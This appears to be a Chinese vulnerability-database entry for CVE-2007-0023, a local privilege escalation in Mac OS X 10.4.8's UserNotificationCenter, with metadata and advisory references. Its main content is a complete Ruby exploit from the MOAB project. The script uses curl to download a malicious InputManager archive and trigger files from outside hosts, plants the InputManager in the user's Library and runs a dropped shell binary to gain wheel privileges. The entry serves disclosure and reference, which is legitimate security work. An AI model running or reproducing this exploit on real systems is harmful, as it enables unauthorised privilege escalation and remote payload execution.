Apple UserNotificationCenter本地权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112062 漏洞类型 设计错误
发布时间 2007-01-23 更新时间 2007-02-20
CVE编号 CVE-2007-0023 CNNVD-ID CNNVD-200701-405
漏洞平台 OSX CVSS评分 6.9
|漏洞来源
https://www.exploit-db.com/exploits/3181
https://www.securityfocus.com/bid/22188
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-405
|漏洞详情
MacOSX是苹果家族机器所使用的操作系统。MacOSX的UserNotificationCenter.app工具在权限处理上存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。如果结合diskutil使用的话,MacOSX的UserNotificationCenter.app中CFUserNotificationSendRequest函数在用户的主目录中以wheel组权限运行任意InputManager,这可能允许本地攻击者以wheel权限执行任意代码。
|漏洞EXP
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
#                    Lance M. Havok   <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#

require 'fileutils'

bugselected = (ARGV[0] || 0).to_i

# INPUTMANAGER_URL    = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
# keeping a local backup. /str0ke
INPUTMANAGER_URL    = "https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/3181.tar.gz"
INPUTMANAGER_PLANT  = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};"             +
                      "mkdir -p ~/Library/InputManagers/;"                                    +
                      "cd ~/Library/InputManagers/;"                                          +
                      "tar -zxvf /tmp/moab_im.tar.gz"

case bugselected
  when 0
    target_url  = "http://projects.info-pull.com/moab/bug-files/notification"
	  trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
  when 1
    target_url  = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
	  trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
  when 2
    target_url  = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
	  trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"	
end

CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"

def escalate()
  puts "++ Welcome to Pwndertino..."
  system CMD_LINE
  sleep 5
  system "/Users/Shared/shX" 
end

escalate()

# milw0rm.com [2007-01-23]
|受影响的产品
Apple Mac OS X Server 10.4.8 Apple Mac OS X 10.4.8
|参考资料

来源:US-CERT
名称:TA07-047A
链接:http://www.us-cert.gov/cas/techalerts/TA07-047A.html
来源:US-CERT
名称:VU#315856
链接:http://www.kb.cert.org/vuls/id/315856
来源:MISC
链接:http://projects.info-pull.com/moab/MOAB-22-01-2007.html
来源:XF
名称:macos-inputmanager-privilege-escalation(31676)
链接:http://xforce.iss.net/xforce/xfdb/31676
来源:BID
名称:22188
链接:http://www.securityfocus.com/bid/22188
来源:OSVDB
名称:32695
链接:http://www.osvdb.org/32695
来源:VUPEN
名称:ADV-2007-0074
链接:http://www.frsirt.com/english/advisories/2007/0074
来源:SECTRACK
名称:1017542
链接:http://securitytracker.com/id?1017542
来源:SECUNIA
名称:24198
链接:http://secunia.com/advisories/24198
来源:SECUNIA
名称:23846
链接:http://secunia.com/advisories/23846
来源:APPLE
名称:APPLE-SA-2007-02-15
链接:http://lists.apple.com/archives/Security-announce/2007/Feb/msg00000.html
来源:docs.info.apple.com
链接:http://docs.info.apple.com/article.html?artnum=305102